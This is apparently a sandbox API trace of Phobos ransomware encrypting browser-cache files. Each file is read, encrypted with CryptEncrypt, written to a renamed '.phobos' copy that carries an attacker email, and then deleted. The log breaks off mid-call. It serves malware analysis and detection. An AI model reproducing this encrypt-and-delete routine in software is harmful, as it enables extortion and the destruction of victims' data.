[0180.115] CloseHandle (hObject=0x15c) returned 1 [0180.115] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\desktop.ini")) returned 0x2006 [0180.115] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0180.116] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.116] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.116] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0180.116] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0180.116] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.116] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x43, lpOverlapped=0x0) returned 1 [0180.117] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0180.117] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x50, lpOverlapped=0x0) returned 1 [0180.118] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0180.119] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.119] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0180.119] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0180.119] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0180.119] CryptDestroyKey (hKey=0xa32d68) returned 1 [0180.119] CloseHandle (hObject=0x15c) returned 1 [0180.119] CloseHandle (hObject=0x17c) returned 1 [0180.119] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\desktop.ini")) returned 1 [0180.120] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0180.120] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\e151e5[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\e151e5[1].gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0180.121] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=43) returned 1 [0180.121] CloseHandle (hObject=0x17c) returned 1 [0180.121] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\e151e5[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\e151e5[1].gif")) returned 0x2020 [0180.121] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\e151e5[1].gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\e151e5[1].gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.121] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\e151e5[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\e151e5[1].gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0180.121] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.121] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.121] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\e151e5[1].gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\e151e5[1].gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0180.122] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0180.122] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.122] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2b, lpOverlapped=0x0) returned 1 [0180.146] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x30, dwBufLen=0x30 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x30) returned 1 [0180.146] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x30, lpOverlapped=0x0) returned 1 [0180.147] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0180.147] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.147] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0180.147] CryptDestroyKey (hKey=0xa32c28) returned 1 [0180.147] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0180.147] CryptDestroyKey (hKey=0xa32d68) returned 1 [0180.147] CloseHandle (hObject=0x17c) returned 1 [0180.148] CloseHandle (hObject=0x15c) returned 1 [0180.148] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\e151e5[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\e151e5[1].gif")) returned 1 [0180.149] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0180.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\e4-190963-91cdfbc1[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\e4-190963-91cdfbc1[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0180.149] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=151081) returned 1 [0180.149] CloseHandle (hObject=0x15c) returned 1 [0180.149] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\e4-190963-91cdfbc1[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\e4-190963-91cdfbc1[1].txt")) returned 0x2020 [0180.149] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\e4-190963-91cdfbc1[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\e4-190963-91cdfbc1[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\e4-190963-91cdfbc1[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\e4-190963-91cdfbc1[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0180.149] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.149] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.150] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\e4-190963-91cdfbc1[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\e4-190963-91cdfbc1[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0180.150] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0180.150] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.150] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x24e29, lpOverlapped=0x0) returned 1 [0180.182] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x24e30, dwBufLen=0x24e30 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x24e30) returned 1 [0180.183] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x24e30, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x24e30, lpOverlapped=0x0) returned 1 [0180.186] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0180.186] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.186] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60, dwBufLen=0x60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60) returned 1 [0180.186] CryptDestroyKey (hKey=0xa32c68) returned 1 [0180.186] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x112, lpOverlapped=0x0) returned 1 [0180.186] CryptDestroyKey (hKey=0xa32d68) returned 1 [0180.186] CloseHandle (hObject=0x15c) returned 1 [0180.186] CloseHandle (hObject=0x17c) returned 1 [0180.186] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\e4-190963-91cdfbc1[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\e4-190963-91cdfbc1[1].txt")) returned 1 [0180.188] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0180.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\google_plus_16dp[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\google_plus_16dp[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0180.295] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1702) returned 1 [0180.295] CloseHandle (hObject=0x194) returned 1 [0180.295] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\google_plus_16dp[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\google_plus_16dp[1].png")) returned 0x2020 [0180.295] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\google_plus_16dp[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\google_plus_16dp[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\google_plus_16dp[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\google_plus_16dp[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0180.295] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.295] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\google_plus_16dp[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\google_plus_16dp[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0180.296] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c28) returned 1 [0180.296] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.296] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x6a6, lpOverlapped=0x0) returned 1 [0180.681] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x6b0, dwBufLen=0x6b0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x6b0) returned 1 [0180.681] WriteFile (in: hFile=0x154, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x6b0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x6b0, lpOverlapped=0x0) returned 1 [0180.681] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32aa8) returned 1 [0180.682] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.682] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0180.682] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0180.682] WriteFile (in: hFile=0x154, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0180.682] CryptDestroyKey (hKey=0xa32c28) returned 1 [0180.682] CloseHandle (hObject=0x194) returned 1 [0180.682] CloseHandle (hObject=0x154) returned 1 [0180.682] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\google_plus_16dp[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\google_plus_16dp[1].png")) returned 1 [0180.685] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0180.685] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\19619569[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\19619569[1].gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0180.694] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=42838) returned 1 [0180.694] CloseHandle (hObject=0x194) returned 1 [0180.694] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\19619569[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\19619569[1].gif")) returned 0x2020 [0180.694] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\19619569[1].gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\19619569[1].gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.695] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\19619569[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\19619569[1].gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0180.695] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.695] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.695] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\19619569[1].gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\19619569[1].gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0180.695] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0180.695] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.695] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xa756, lpOverlapped=0x0) returned 1 [0180.760] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa760, dwBufLen=0xa760 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa760) returned 1 [0180.760] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xa760, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xa760, lpOverlapped=0x0) returned 1 [0180.762] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, 